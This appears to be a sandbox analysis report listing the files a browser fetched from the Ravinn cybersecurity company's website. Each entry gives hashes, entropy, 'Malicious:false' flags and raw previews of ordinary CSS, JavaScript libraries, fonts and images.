                                                Preview:<!doctype html>.<html lang="en-AU">..<head>.. Google Tag Manager -->.<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':.new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],.j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=.'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);.})(window,document,'script','dataLayer','GTM-PGPTP2GV');</script>. End Google Tag Manager -->. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<meta name="viewport" content="width=device-width, initial-scale=1" />..<link rel="profile" href="https://gmpg.org/xfn/11" />..<title>Cyber Resilience &amp; Threat Intelligence Specialists | Ravinn</title><link rel="preload" as="style" href="https://fonts.googleapis.com/css2?family=Open+Sans:w400,700&#038;display=swap" /><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Open+Sans:w400,700&#038;display=swap" media="print" onload="this.medi
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):10380
                                                Entropy (8bit):4.786811179416952
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7CA43BFAD41EFB59797ABB4DBA9653E4
                                                SHA1:6F9DD52A5D9917CC09BB80F0DDD288E2B14FE723
                                                SHA-256:DC0C1F2AEB24E1B9502DB43409CA56526E992FE4C2D78C3752739AEDBB213FDA
                                                SHA-512:6593B544B22D738286D7A40D83E6280D2D6C614A865F813EDE8A66DC6914648491F4371E7479447E0322E180A16B4049F9D63B8E9F95C2C859C77FCBBB8CB50B
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/css/responsive.css?v=1743482759
                                                Preview:@media screen and (min-width:1200px){. .container{. max-width: 1160px;. }.}.@media screen and (min-width:1600px){. .container{. max-width: 1560px . }...grid-about {...-ms-grid-rows: 0.85fr 0.85fr 0.85fr;...grid-template-rows: 0.85fr 0.85fr 0.85fr;..}...inner-banner {...min-height: 42vh;..}.}..@media screen and (min-width:992px){...sub-menu li a:hover{...background-color: var(--secondary-color);...color: var(--dark-color) !important;..}....primary-menu li:hover > .sub-menu{...display:block;..}...primary-menu > li > a:hover{...background-color: #fff;...color: var(--primary-color) !important;..}.}...@media screen and (max-width:991px){...primary-menu{...-ms-flex-wrap:wrap;... flex-wrap:wrap;..}...menu-wrap {...position: fixed;...left: 0;...top: 0;...bottom: 0;...right: 0;...background: var(--primary-color);...height: 100vh;...padding: 7rem 30px 25px;...display:none;..}....body.nav-active{.. overflow:hidden;..}...nav-active .menu-wrap{...display:block;..}...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1000x640, components 3
                                                Category:dropped
                                                Size (bytes):299709
                                                Entropy (8bit):7.980086115618575
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7810B4A3BE5AC10361EC5388C20C8FBB
                                                SHA1:4CED59B025456AD15C07AFE2FBCD044898E03F94
                                                SHA-256:6E8AD76C58086EB8653DC7B9BD7AA210AE1383205C6ED4547CE110C8D3A15B5D
                                                SHA-512:BB823EB50088FFCBDD2E6655A5D03E25828CDB54F21E40703FE21CCB701A813C598D53A2362A844723C67CB41B348030B06F5557A36F74FB196EA1F455C31BAA
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:......JFIF.....H.H.....C....................................................................C.......................................................................................................................P......................!..1A.Qa.."q.2......B...#Rb...3r.$...%4CS..Dc.s..&5Td.E.................................G.....................!1AQa...q....."2..BR.b...r.......#C.c..3....S..............?....Y.y.S......a.+.._...(.../.F....n..j|...}....&6;.dk?R#..[..1...'.+....mHq.).6.....+J......N.uI.0... .Y.~.#?.Z...:R.B8....s.X....I3./...b7b..O.?0...6]..N..?. ..s...".....-..U..Ym.Oq.....|...c......E..&5...\c.v...w."?Q.MG]....cd.;.....d.....f4.,?<...T.zH.;.. .^y.4...."..F..s.zF.k...Q6t)...G/...X...%....X...R..{k..R.....?...l.y_.J..*..G..\A...L2%..j..6F. .)=...U..*.......w)k).r....%.2.g.q..}.%@...Q.S......;@3..:($......-5../...0$..H..V...x..Q>.'H..(#...|......D..0?._.ks.J~...*R ...L[.K..'m......T.+..../....;.vq.....t...O>_....k;&7KW.V>..xa-o.e4.A(TX.=A........i.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (20588), with no line terminators
                                                Category:downloaded
                                                Size (bytes):20588
                                                Entropy (8bit):5.303437182546968
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:396C27DB28E3ACD6F2A54C55ACCD4643
                                                SHA1:C6137AB9E0E90B769654540B0F71B6A139E1E3F1
                                                SHA-256:2207C2176989AAFE2A6867E3167C513AACEEF0B38AF1EF7AE7FC9E301C6271C0
                                                SHA-512:436CBEB3CFE7C81BF583AD43F0D4423950F79BD6F7BACCA6A5265AA68ECC50B4381685608518B7DDE0167FD4C18CD61E9B27BA87C6B83B82695EB77274F3AB7B
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.klaviyo.com/onsite/js/runtime.d6f8c2852d4e7a72345c.js?cb=1
                                                Preview:!function(){"use strict";var e,a,t,n,r,o,d,f,i,c,b,l={},v={};function m(e){var a=v[e];if(void 0!==a)return a.exports;var t=v[e]={id:e,exports:{}};return l[e].call(t.exports,t,t.exports,m),t.exports}m.m=l,e=[],m.O=function(a,t,n,r){if(!t){var o=1/0;for(c=0;c<e.length;c++){t=e[c][0],n=e[c][1],r=e[c][2];for(var d=!0,f=0;f<t.length;f++)(!1&r||o>=r)&&Object.keys(m.O).every((function(e){return m.O[e](t[f])}))?t.splice(f--,1):(d=!1,r<o&&(o=r));if(d){e.splice(c--,1);var i=n();void 0!==i&&(a=i)}}return a}r=r||0;for(var c=e.length;c>0&&e[c-1][2]>r;c--)e[c]=e[c-1];e[c]=[t,n,r]},m.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return m.d(a,{a:a}),a},t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__},m.t=function(e,n){if(1&n&&(e=this(e)),8&n)return e;if("object"==typeof e&&e){if(4&n&&e.__esModule)return e;if(16&n&&"function"==typeof e.then)return e}var r=Object.create(null);m.r(r);var o={};a=a||[null,t({}),t([]
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 750 x 288, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):41839
                                                Entropy (8bit):7.972864886251494
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:D31D1C6DEBB743A86ED7E8496323A835
                                                SHA1:255F1E8063F4F5CCDAA6F93C45034021661C42F4
                                                SHA-256:C48CE91805AC75184DDB9FD5AF7A3E445B745DAC3ADBC4C50DE9A488DA358013
                                                SHA-512:55CB4290FEAEAF01C21964F74145380076F9D25A06C9052AE3DE0408124C9011DE2FDD565C22C2B66585C6BC95A6DACB80002C719E3E353BA47E709D9EB4AFAD
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR....... .............pHYs..........+.... .IDATx..y........Z#.U.T...C..]S..i.....`...@,...../6`5..........l.cL.XMa.S4E14....h(.C1*.Z..htt....22.F......I..q...y...............8.^-.]A..A..A......z.{Im.. .. ..`)Kp.z.[..%.+.. .. .....3........A..A..a.S..>...u..c%./.. .. .....9.c..+Jj_..A..A..5.2..qJ...%.!.. .. .....y-...*.{I... .. ...W6.Yn....... .. ......?hs~/..]..A..A.:.,.}.G..B./-.?A..A..A.V..T....{.. .. .. L....C.+......P.m..W..A..A...eh.g./....\SB.. .. ..0m(Kp..qOsl...%.-.. .. ..Ah.k\.*.O.... .. .....}6..S...J.T...A..A..aJS...*kj;......Y.8.A..A..a.R..>.e....%.C..A..A..,. ...l(a.. .. ..0e)Cp.V[.a.D.K.. .. .. LY....tY.].c..A..A..)M..{'. ..k.c..A..A..)M......... .. .B.....b*#.. .. .m.Jp....*..... .. ..0..V.>F........ .. ...[.}....b.... .. .m(C.>......]..A..A..2h..Z`c.c..A..A..)O...l.K........A..A..a.3h.}m.D.... .. .. Ly.....Ab... .. .......1U..A..A.<(.9..:...*.0T..h6. .. ..0Rt+..~.......k..C....A..A..A..ftY.[.....c.....].A..A..A...A.wb*.).
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (32019)
                                                Category:downloaded
                                                Size (bytes):35445
                                                Entropy (8bit):5.082186391611322
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:2AFCFF647ED260006FAA71C8E779E8D4
                                                SHA1:C4E5994F24EE8C8D2CF2D6602F0B56B9096A2E98
                                                SHA-256:081AE9BAAACC857C1C2CB51DE6DBD0E1EB811C2761EF01A50DF373F2F6EEFE22
                                                SHA-512:66AD813B1CA1BE74455EED3E584EA88E964B394DA3767A9BACCD61995746CF27826B50E03375F943803F22CF710352246D478377BEF9E5D34D23F3F349FD8F7B
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/js/isotope.pkgd.min.js
                                                Preview:/*!. * Isotope PACKAGED v3.0.6. *. * Licensed GPLv3 for open source use. * or Isotope Commercial License for commercial use. *. * https://isotope.metafizzy.co. * Copyright 2010-2018 Metafizzy. */..!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,s,a){function u(t,e,o){var n,s="$()."+i+'("'+e+'")';return t.each(function(t,u){var h=a.data(u,i);if(!h)return void r(i+" not initialized. Cannot call methods, i.e. "+s);var d=h[e];if(!d||"_"==e.charAt(0))return void r(s+" is not a valid method");var l=d.apply(h,o);n=void 0===n?l:n}),void 0!==n?n:t}function h(t,e){t.each(function(t,o){var n=a.data(o,i);n?(n.option(e),n._init()):(n=new s(o,e),a.data(o,i,n))})}a=a||e||t.jQuery,a&&(s.prototype.option||(s.prototype.option=function(t){a.isPlainObject(t)&&(this.optio
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 109808, version 772.1280
                                                Category:downloaded
                                                Size (bytes):109808
                                                Entropy (8bit):7.990726638724642
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:005C9AA92B564B73B7582CC4F1FA49CB
                                                SHA1:373361ED756B1FE68CE2F5968D467826B6973BB5
                                                SHA-256:FAAE6FC0AA94CC5BDE5076647C817A23206096A1CBEDA10D1C6F3D89D6163ED1
                                                SHA-512:CF057683226D25FAB8518295D9A2BBC7261B85A0E911D323F949719B6484BEB99843887AC634E58F21988C5AF3B8D825B8289CBFE29B2D4E1817016BE1499BBA
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://use.fontawesome.com/releases/v6.4.2/webfonts/fa-brands-400.woff2
                                                Preview:wOF2...............l.............................8.$. .`..$.....|.(.. . ..fq..".....~..:......!!.T5..?.........e`...e;........}N..'.~..*.F..QV...7..E..........(.a$9u.%....|j... v..n..........v.lz..t...}..~.....1.XJ...-[...K.....,._...Qw...G..8..9.E.'\.:of4#.Y@iW....J.@....}d..3Q.M....C...\..v.).r.)..\........;..k.6;........>..I..k..~.8.0.A.X>...?h.R....B..%.....i........WUW.......Q..Y(!.I(.B.EFB2.m..ad..6J...0..Yo;.5..!c9$..3..W.@Xk.J...{,.~.35..}Y.......d....v6....r.^fE.eu/......"....n,.......0.....r..pDE.....3?..nF.l......jR&...&e..7......92.../rH.12cdW.NZ..)...K-V..+-v.1....h.B....1....| ...L..../...a..i.{.}.i....i.J../..M.<..&...}..c......QM.Y..?.....-..t&.$.)>.......o..?.....c....Zq...R.q...Ww...g.'.....W......E.8o....I.Rn .....l{.g...%...LWK...M..3..z]..8.\..Y.G.N......@.9..m.(..{....\U.....[B......;^..^.V.=.._-kB.<..I.....H.....'...S.@!...s.H..c.vr.{.R<T.\C.B~<O.|../Ze...|.<..'?.U.V>7.Y...I5.uh..//...2Di1x..K.'m......i...,.qoIn.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (5002), with no line terminators
                                                Category:downloaded
                                                Size (bytes):5002
                                                Entropy (8bit):4.875690095889108
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:F6A86E8018FC1F6AE254B339ACBD1CDD
                                                SHA1:9C256AC79696564334355F8C4B848590677FD583
                                                SHA-256:E6E2A25C4C1B69087D720776FF9569E9698C9EC52BDD5659C346BCACA9CE28D5
                                                SHA-512:2A1157A5EF95244BB91D86C9C8A42CF55BF0181FA341EA6A6F8667961505FE3406C5825C8DDC4E4DFE9CAF8E3984E73BF751452ECD7C0CA5697EB42738D381D6
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/css/splide.min.css
                                                Preview:.splide__container{box-sizing:border-box;position:relative}.splide__list{backface-visibility:hidden;display:-ms-flexbox;display:flex;height:100%;margin:0!important;padding:0!important}.splide.is-initialized:not(.is-active) .splide__list{display:block}.splide__pagination{-ms-flex-align:center;align-items:center;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-ms-flex-pack:center;justify-content:center;margin:0;pointer-events:none}.splide__pagination li{display:inline-block;line-height:1;list-style-type:none;margin:0;pointer-events:auto}.splide:not(.is-overflow) .splide__pagination{display:none}.splide__progress__bar{width:0}.splide{position:relative;visibility:hidden}.splide.is-initialized,.splide.is-rendered{visibility:visible}.splide__slide{backface-visibility:hidden;box-sizing:border-box;-ms-flex-negative:0;flex-shrink:0;list-style-type:none!important;margin:0;position:relative}.splide__slide img{vertical-align:bottom}.splide__spinner{animation:splide-loading 1s li
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:data
                                                Category:downloaded
                                                Size (bytes):1048576
                                                Entropy (8bit):7.999641880393636
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:47F8058BF2951AA5DBCB386D6B52FE32
                                                SHA1:3805A55ED03D69D50C058A831048B64ADC705CD2
                                                SHA-256:E4B9F4542AF8C767623BC10C325BCF349AD9A038A8CD58D2912A4B3A190EF2E9
                                                SHA-512:BE5B85F846A2367F834E01759D6D0EE0F908DFAB8A1F4718D0C16A951D62920E53BD644432A9E00332DA8BAAEE794B3D45A948378EBD82A71ED7106978460122
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp4:2f905610c59538:1
                                                Preview:.%...G..7....B.5....35Io..nU..H.&.i.XP...)D..<.H..."T.+....s.zmN.....q.J..;..<y....w..Qn.vB_..9...W...X7...A.p.f..d..5E..9....S:.dcf..!p........f= )QA.v........$.w9..r...=..&X.T ...cnaJ..|^...N.Kr.nsf.Z../.5..3......AY.-."........p..58......#p?..GFp.....\Hvm..`.E6......Zd.a[.b.d...$...E........q1.....)=.%\.....s.e..`..$..|..a.5?@..D..!.g:.3x=...?r.j.....k.J..oc...b@r....$..........5.O.iA6.C.I.$..... 7..n...2....:6....Z.v.s#T....g..Z.....N.=....eV.l%...i....&..*...7.e.Rb4..w...\a.y......@..:..~.5...@H.U..c>S3.. ...........9-....+.~$.........o.^...C...f\.b.9v:%..h.....<...R..T.O...E.=y...MvM..W#.....V.,......k.....m*].se.`..#.I...x...`.....Q..RY..v....6x..._.V.`.l.FC.MG...C...}.D...S...C.?......C4.......l.C.....9...]...\..W...d..qbp._..G.K..=f.....j..r.mv....(b...a.&..*}...T....`.....l.]8..e}@.{.c../.....*....59[,..2....l;X...F.I.z..s"...~uF..........Jr|}].D..=....i..1...j..z.....QD.=..)....d..^7...;E~.<.|<k....~...V...I......efU.!
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 198 x 68, 8-bit/color RGBA, non-interlaced
                                                Category:downloaded
                                                Size (bytes):12782
                                                Entropy (8bit):7.9788935463612765
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:487892518B31701298D728C606DA103F
                                                SHA1:77467EACF5B599447A16099039B2AC0F6C4F9A04
                                                SHA-256:61A0F6941DAF2362DD5B98CA97CD98F90D83703AB358571E5A761A1EB172A19E
                                                SHA-512:3FA5330254FABBC0E9BCEC73EF4D65565B317CB8FAD40206050D2804060933B74F21F7284E0A1881021A6F97995E4FA2F749554153721E827447B15368FE72F5
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/veterans.png
                                                Preview:.PNG........IHDR.......D.......J.....pHYs.................sRGB.........gAMA......a...1.IDATx..}.`...o.......z....^.H...X....Z(". ..A....".."....H..tH...@zv......M.......lf.....|.*.JPUu......A.U........s.!...@...F............a. .~ @.......F.........................#.....xu@b.....U......B .. $%%.f...)!\X.[......Q...Rl]*...U..'\-(.>...WT].+.T...^q}W.j-..P..H.....@5..7.H.r.2....:..}%=.....f}..k.S.6.n....ZB?...vc...8v.....Q.Z5....E...........F.6s........V...3....j.b.I&..W....z..}..E.....}.........L...MU.^...*\..}V..y.T......{....D`....:.*..w.o.........n.(.j..ej.<W.=EoJ./_......qE.6vn........t"s...C.+.wSy..U.....V.P!..Y.y2...QA.O.nJ.6...x........5.G.=..<.....5.k.._'..X.b..k.BNN..M....;5..n=......]&..dax.6........sh...CN......Q-*...g...........6^...b.b|....P....Z+.]+.R....?i..........._.....v..%....:u............q.D...D.^....@A.......F..5.N........Qxi.H=y....QQ.e..4i.L.St.,,(.7_......B"..-[..Q..}.V.=w.7..+c)./..s.`.?...U...W_!.....@..oD.~}.t.X.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Unicode text, UTF-8 text, with very long lines (560)
                                                Category:downloaded
                                                Size (bytes):237872
                                                Entropy (8bit):4.93213170413018
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9D73034AE784703C63E6F92BC2D3761A
                                                SHA1:58FB70B78CF973AC246AC9E145058866DFCEF40F
                                                SHA-256:B05ED0343D5228C7FC6210B1D56FDA23B9BFEF0063E87395BFB0A268C7D2E3D8
                                                SHA-512:BEF75FA14E773E03B2DBF173C8E7474907E2523605B2D3EAB60734429CB49508910A01C68B9CF90A4F029545018891CF0FCA3920483B3E8CADC33BBF448D03FE
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/css/bootstrap.css?v=1743482759
                                                Preview:@charset "UTF-8";./*!. * Bootstrap v5.2.0 (https://getbootstrap.com/). * Copyright 2011-2022 The Bootstrap Authors. * Copyright 2011-2022 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.:root {. --bs-blue: #0d6efd;. --bs-indigo: #6610f2;. --bs-purple: #6f42c1;. --bs-pink: #d63384;. --bs-red: #dc3545;. --bs-orange: #fd7e14;. --bs-yellow: #ffc107;. --bs-green: #198754;. --bs-teal: #20c997;. --bs-cyan: #0dcaf0;. --bs-black: #000;. --bs-white: #fff;. --bs-gray: #6c757d;. --bs-gray-dark: #343a40;. --bs-gray-100: #f8f9fa;. --bs-gray-200: #e9ecef;. --bs-gray-300: #dee2e6;. --bs-gray-400: #ced4da;. --bs-gray-500: #adb5bd;. --bs-gray-600: #6c757d;. --bs-gray-700: #495057;. --bs-gray-800: #343a40;. --bs-gray-900: #212529;. --bs-primary: #0d6efd;. --bs-secondary: #6c757d;. --bs-success: #198754;. --bs-info: #0dcaf0;. --bs-warning: #ffc107;. --bs-danger: #dc3545;. --bs-light: #f8f9fa;. --bs-dark: #212529;. --bs-primary-
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text, with very long lines (1238)
                                                Category:downloaded
                                                Size (bytes):1239
                                                Entropy (8bit):5.068464054671174
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9E8F56E8E1806253BA01A95CFC3D392C
                                                SHA1:A8AF90D7482E1E99D03DE6BF88FED2315C5DD728
                                                SHA-256:2595496FE48DF6FCF9B1BC57C29A744C121EB4DD11566466BC13D2E52E6BBCC8
                                                SHA-512:63F0F6F94FBABADC3F774CCAA6A401696E8A7651A074BC077D214F91DA080B36714FD799EB40FED64154972008E34FC733D6EE314AC675727B37B58FFBEBEBEE
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js
                                                Preview:!function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href")||""}function r(e,t){var r=e.substr(t,2);return parseInt(r,16)}function n(n,c){for(var o="",a=r(n,c),i=c+2;i<n.length;i+=2){var l=r(n,i)^a;o+=String.fromCharCode(l)}try{o=decodeURIComponent(escape(o))}catch(u){e(u)}return t(o)}function c(t){for(var r=t.querySelectorAll("a"),c=0;c<r.length;c++)try{var o=r[c],a=o.href.indexOf(l);a>-1&&(o.href="mailto:"+n(o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.querySelectorAll("template"),n=0;n<r.length;n++)try{i(r[n].content)}catch(c){e(c)}}function i(t){try{c(t),o(t),a(t)}catch(r){e(r
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 150020, version 772.1280
                                                Category:downloaded
                                                Size (bytes):150020
                                                Entropy (8bit):7.99708187417653
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:D5E647388E2415268B700D3DF2E30A0D
                                                SHA1:97F0942C6627DDD89FB62170E5CAC9A2CBD6C98C
                                                SHA-256:886C86112A804EF1DDD1CB206AF4C8C40E34B73C26652CA231404AA35A6B30D9
                                                SHA-512:50B2FFD7537D0424286936CB7BA566004A664F447E4AAAC8FA40CEB2850EAD6CDB39C957515AE05A07AAEB8F6E3E428C4B95E4EFA3EDCADC9473E9E200BB47D6
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://use.fontawesome.com/releases/v6.4.2/webfonts/fa-solid-900.woff2
                                                Preview:wOF2......J........0..I..........................8.$. .`..<......D.@..p. .....Dp....z.aD.f.O.=i.x.TUUU....l........g...o~..?..o...........O......l...x}~........!.@/*..U.....>.........{;m.B..w.@^Q^.Z...f ........t....7....`..Lr.......P.B.Jx....J.0).K.T;S........ODg..>@If3..{.7..#.?..t.n'.M...@F....D..S..Gz}.0$.X..D....p5.vw......y.......O8.....F..,i..q.X...$.+..&.4^*....P.x...=....G..b. .1....d....V.u+...;WwMw.L.LwOMuM....Zi.w.[y..!.I.5Y..!.l.....6^..".q.`.:c^.8<..6..^...yK.sK}..f..y;.f....].V;r.d[..M.la/.X6M.q...N.]...fH%.X .t'.?..%....H..?<.:.}(...#.....Jp...2\*@...*.0.)*d....d.j.CM.B.!K...p.a.*...".@.(.6 ......|............1.S..;...'2..2VjC{RFX.;8aG.ZG....._....'......:....<_6.....\..d.h.....7.....Z.2MAT4I.$.....o...~..".sV.......h..^...&4)........!...!).<..n.Na%R.....h.p...KM.h..[.z_.CX zoF..H`.2(U.S.v...;m.UvjA...T........^........._... ....G......2..9L=...s...{........A0w...=.s.......=3w...@w. ...Y......rE.l.Ze...G.....X......A..
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (5218)
                                                Category:downloaded
                                                Size (bytes):5219
                                                Entropy (8bit):5.462487395802177
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:0BC90DB7125976D3C252E1CC7466C7F7
                                                SHA1:ED251AE0B4947237392D01609F22DED002556782
                                                SHA-256:53066018907DCBD12C7AA99463FF377F8E94FB6FFA9746055BF1966FCA8A15CE
                                                SHA-512:74E7D1BCA338378AA75B248EEFBFC1D16B7798B976A1533E1A3364492F91E7F99B1E7E9BC54C13CCD6FBDE54FF4402691CC6B59212CEA66FDA1281A852458D70
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://static.klaviyo.com/onsite/js/klaviyo.js?company_id=WnvUEf
                                                Preview:function _typeof(e){return _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},_typeof(e)}function ownKeys(e,t){var o=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),o.push.apply(o,r)}return o}function _objectSpread(e){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{};t%2?ownKeys(Object(o),!0).forEach((function(t){_defineProperty(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):ownKeys(Object(o)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(o,t))}))}return e}function _defineProperty(e,t,o){return(t=_toPropertyKey(t))in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writ
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (52276)
                                                Category:downloaded
                                                Size (bytes):102217
                                                Entropy (8bit):4.7821044831117785
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5222E06B77A1692FA2520A219840E6BE
                                                SHA1:8B4236206A8B86AF3761A244277663046D7FF7EE
                                                SHA-256:0934B1FC0D3A766D41D3ADF5E7A115875E66E98EBBA408D965A41CF3D2CB4AB5
                                                SHA-512:CF780BA5DEF29277F562835B0B3A9129CE2ACA8AFC81A294D6A9A7F824A1C5BB81BAC00D23D42946884606B7821642B12E17A2E92F424171446DB2AEA8B8340C
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://use.fontawesome.com/releases/v6.4.2/css/all.css?ver=6.4.2
                                                Preview:/*!. * Font Awesome Free 6.4.2 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Unicode text, UTF-8 text, with very long lines (29400)
                                                Category:downloaded
                                                Size (bytes):29803
                                                Entropy (8bit):5.246025201690554
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:58DB39C8E19B600AD104CFB9A528C2B2
                                                SHA1:DBDEF6617D6FB7F141996C3A1D5AEF202EADF867
                                                SHA-256:159B16EC7D95E57F531A29D28E3C18278D7D5E46B6EC8F173C3996AF21A55ADC
                                                SHA-512:E137231D740C2CCED8E9EA9F89AB2BB2744273C0FFBA70DE63550628681FC322D4093B0760CC45EFF5076B28C8B4A40A2283FA4D343A00C6A66FDC3618C02F36
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/js/splide.min.js
                                                Preview:function r(n,t){for(var i=0;i<t.length;i++){var r=t[i];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(n,r.key,r)}}function Jt(n,t,i){t&&r(n.prototype,t),i&&r(n,i),Object.defineProperty(n,"prototype",{writable:!1})}./*!. * Splide.js. * Version : 4.1.4. * License : MIT. * Copyright: 2022 Naotoshi Fujita. */.var n,t;n=this,t=function(){"use strict";var v="(prefers-reduced-motion: reduce)",G=4,rn=5,r={CREATED:1,MOUNTED:2,IDLE:3,MOVING:G,SCROLLING:rn,DRAGGING:6,DESTROYED:7};function D(n){n.length=0}function o(n,t,i){return Array.prototype.slice.call(n,t,i)}function R(n){return n.bind.apply(n,[null].concat(o(arguments,1)))}function on(){}var p=setTimeout;function h(n){return requestAnimationFrame(n)}function u(n,t){return typeof t===n}function un(n){return!c(n)&&u("object",n)}var e=Array.isArray,x=R(u,"function"),C=R(u,"string"),en=R(u,"undefined");function c(n){return null===n}function m(n){try{return n instanceof(n.ownerDocument.default
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:PNG image data, 1080 x 377, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):178134
                                                Entropy (8bit):7.991784559534781
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:AA0CD8305CD879E42B01D403D8783E8C
